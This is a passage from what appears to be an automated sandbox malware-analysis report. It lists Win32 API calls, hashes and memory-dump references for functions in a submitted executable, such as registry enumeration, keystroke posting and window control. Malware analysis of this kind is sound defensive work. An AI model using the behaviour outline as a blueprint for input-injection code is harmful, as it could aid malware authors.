                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0046B3D2
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 0046B3FD
                                                                                                                                                                                                                                                            • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 0046B430
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,000000FF,00000000), ref: 0046B459
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0046B492
                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?), ref: 0046B49D
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Close$ConnectEnumOpenRegistryValue_malloc_memmove_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2027346449-0
                                                                                                                                                                                                                                                            • Opcode ID: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                            • Instruction ID: e744fe3a0f0af3658e2b80b3541497a384b181c150b1b14c88f03688e4e42502
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2b9cac7d06e9b3c82fe541c1c7e321d1f48fab5647307c3a769b9fb80d6ae4cb
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 92613D71218301ABD304EF65C985E6BB7A8FFC8704F008A2EF945D7281DB75E945CBA6
                                                                                                                                                                                                                                                            Function 0047A66E Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                                                                                                                              • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                                                                                                                                                                            • GetMenu.USER32 ref: 0047A703
                                                                                                                                                                                                                                                            • GetMenuItemCount.USER32(00000000), ref: 0047A74F
                                                                                                                                                                                                                                                            • GetMenuStringW.USER32(00000000,?,?,00007FFF,00000400), ref: 0047A783
                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 0047A79E
                                                                                                                                                                                                                                                            • GetMenuItemID.USER32(00000000,?), ref: 0047A7E0
                                                                                                                                                                                                                                                            • GetSubMenu.USER32(00000000,?), ref: 0047A7F2
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000111,?,00000000), ref: 0047A884
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Menu$Item$CountMessagePostStringWindow_malloc_wcslen
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3257027151-0
                                                                                                                                                                                                                                                            • Opcode ID: 8fc5eeab8080584ee52c0874cf6d3340a0e6a6b52f3e9dd50e1d1c8b3473a2b3
                                                                                                                                                                                                                                                            • Instruction ID: 02f8ada5611b6a2978ded3aa89f74167ce8c021908d800e5e23178b580333db3
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8fc5eeab8080584ee52c0874cf6d3340a0e6a6b52f3e9dd50e1d1c8b3473a2b3
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: AA51FA71504301ABD310EF25DC81B9FB7E8FF88314F108A2EF989A7241D779E95487A6
                                                                                                                                                                                                                                                            Function 004443FC Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 0044443B
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00444450
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 004444A4
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000010,?), ref: 004444D4
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000011,?), ref: 004444F5
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,00000012,?), ref: 00444541
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000101,0000005B,?), ref: 00444566
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                            • Opcode ID: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                                                            • Instruction ID: 8f44bbd55e3387c5fecf3766ecc31f273ddc6601011f0052083f6d8a5cbafb33
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4481168041494e1849bbb8b05fe85edf3de4190132d6f0e43f59e21d2d662a19
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2051D6A05047D53AFB3682748846BA7BFE42F86704F08868BE1D5559C3D3ECE994CB68
                                                                                                                                                                                                                                                            Function 004445F4 Relevance: 10.7, APIs: 7, Instructions: 170windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • GetParent.USER32(?), ref: 00444633
                                                                                                                                                                                                                                                            • GetKeyboardState.USER32(?), ref: 00444648
                                                                                                                                                                                                                                                            • SetKeyboardState.USER32(?), ref: 0044469C
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000010,?), ref: 004446C9
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000011,?), ref: 004446E7
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,00000012,?), ref: 00444730
                                                                                                                                                                                                                                                            • PostMessageW.USER32(?,00000100,0000005B,?), ref: 00444752
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessagePost$KeyboardState$Parent
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 87235514-0
                                                                                                                                                                                                                                                            • Opcode ID: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                                                            • Instruction ID: 3b822c4357a53f38689f34ecdfb8cd013e642acfd09065eaf4f6fa9230d15588
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 988eb571eba6180a4ec7f7c38e49780efe397f424a6b2059308ac6c1f0666447
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 7451D4B05047D139F73692688C45BA7BFD86B8B304F08868FF1D5156C2D3ACB895CB69
                                                                                                                                                                                                                                                            Function 0045537F Relevance: 10.6, APIs: 7, Instructions: 149windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001308,?,00000000), ref: 0045539F
                                                                                                                                                                                                                                                            • ImageList_Remove.COMCTL32(?,?), ref: 004553D3
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,0000133D,?,00000002), ref: 004554BB
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455736
                                                                                                                                                                                                                                                            • DeleteObject.GDI32(?), ref: 00455744
                                                                                                                                                                                                                                                            • DestroyIcon.USER32(?), ref: 00455752
                                                                                                                                                                                                                                                            • DestroyWindow.USER32(?), ref: 00455760
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: DeleteDestroyMessageObjectSend$IconImageList_RemoveWindow
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 2354583917-0
                                                                                                                                                                                                                                                            • Opcode ID: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                                                            • Instruction ID: c6eb43681ca9132c11a6020d2ba108f27148fdc9c8ef1f50c91adec3b3f4716e
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 35278296b08b7a07ab4037b75477043e0b107217007b5923df3ad7b8258325fa
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 76516B74204A419FC714DF24C4A4BB677F5FF8A302F1486AAED998B392D738A849CB54
                                                                                                                                                                                                                                                            Function 0044982A Relevance: 10.6, APIs: 7, Instructions: 135COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                            • Opcode ID: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                            • Instruction ID: 5d193f65ffce5f3a1406795a0d9a37a93f2f4887bdc9b14e5c8c629f49d9966a
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3e9aeaa8e8d9a9efa26880ce8322a829618f36bb2b0e75f2f32cf9c77c57eef6
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0A413871900114ABE710DF58CC84FAF7765EB46320F14826EF858AB3C1C7745D02EB98
                                                                                                                                                                                                                                                            Function 0044882A Relevance: 10.6, APIs: 7, Instructions: 130windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004488BD
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000469,?,00000000), ref: 004488D3
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$MessageMoveSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 896007046-0
                                                                                                                                                                                                                                                            • Opcode ID: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                                                            • Instruction ID: 578be1c3660e2fd518c7beccd973f741d6ce186f3db94e5441c29ef1e5fc56da
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 487afd455632248a3d509b30b3d46b8f07dcfb1983bcccedac1426ad742150ab
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5F419D742003809FF724DB24C894BAB77E0FF96305F18446EF5859B291DB78A845CB59
                                                                                                                                                                                                                                                            Function 00448AB2 Relevance: 10.6, APIs: 7, Instructions: 98windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00448AC9
                                                                                                                                                                                                                                                            • GetFocus.USER32 ref: 00448ACF
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448B72
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                                                                                                                                                                                                                                            • EnableWindow.USER32(?,00000001), ref: 00448C09
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: Window$Enable$Show$FocusMessageSend
                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                            • API String ID: 3429747543-0
                                                                                                                                                                                                                                                            • Opcode ID: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                                                            • Instruction ID: 6f3afe48a64986b2df7f4b22be5166ca64fe0b5af1f2aee4406df3dc20f3ce1d
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 611a307e80107d343a79f7fc2cfd1bfbec1158008c6b2b7743f92638a6db6fc0
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F331C4706043805BF7248F24CCC8BAFB7D4FB95305F08491EF581A6291DBBCA845CB59
                                                                                                                                                                                                                                                            Function 0045D448 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 83COMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(00000001), ref: 0045D459
                                                                                                                                                                                                                                                            • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CF
                                                                                                                                                                                                                                                            • __swprintf.LIBCMT ref: 0045D4E9
                                                                                                                                                                                                                                                            • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D52D
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: ErrorMode$InformationVolume__swprintf
                                                                                                                                                                                                                                                            • String ID: %lu$\VH
                                                                                                                                                                                                                                                            • API String ID: 3164766367-2432546070
                                                                                                                                                                                                                                                            • Opcode ID: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                            • Instruction ID: a5bcfc38f1a54d16d783223dfbe865d4bc924dff4e6617147b97584b2165572c
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 886de82fe176795aba7bdb97f378ec25336d41d961a023bcb5d27bbb6add7ed5
                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 11317171A00209AFCB14EF95DD85EAEB7B8FF48304F1084AAF905A7291D774EA45CB94
                                                                                                                                                                                                                                                            Function 00450B7C Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 80windowCOMMON
                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2999784282.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999765833.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999858013.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999890900.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999913081.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999934554.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2999999187.00000000004ED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_LKxcbzlwkz.jbxd
                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                            • API ID: MessageSend
                                                                                                                                                                                                                                                            • String ID: Msctls_Progress32
                                                                                                                                                                                                                                                            • API String ID: 3850602802-3636473452
                                                                                                                                                                                                                                                            • Opcode ID: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
                                                                                                                                                                                                                                                            • Instruction ID: 3e9a69ee1b5e3cb2ffa50bc712587bba9ef5757239c838e11c91c46d95a842ac
                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: bde72abdda352e35c3e71b9276821fa19048fea6f3879b5342d5f34549d04d22
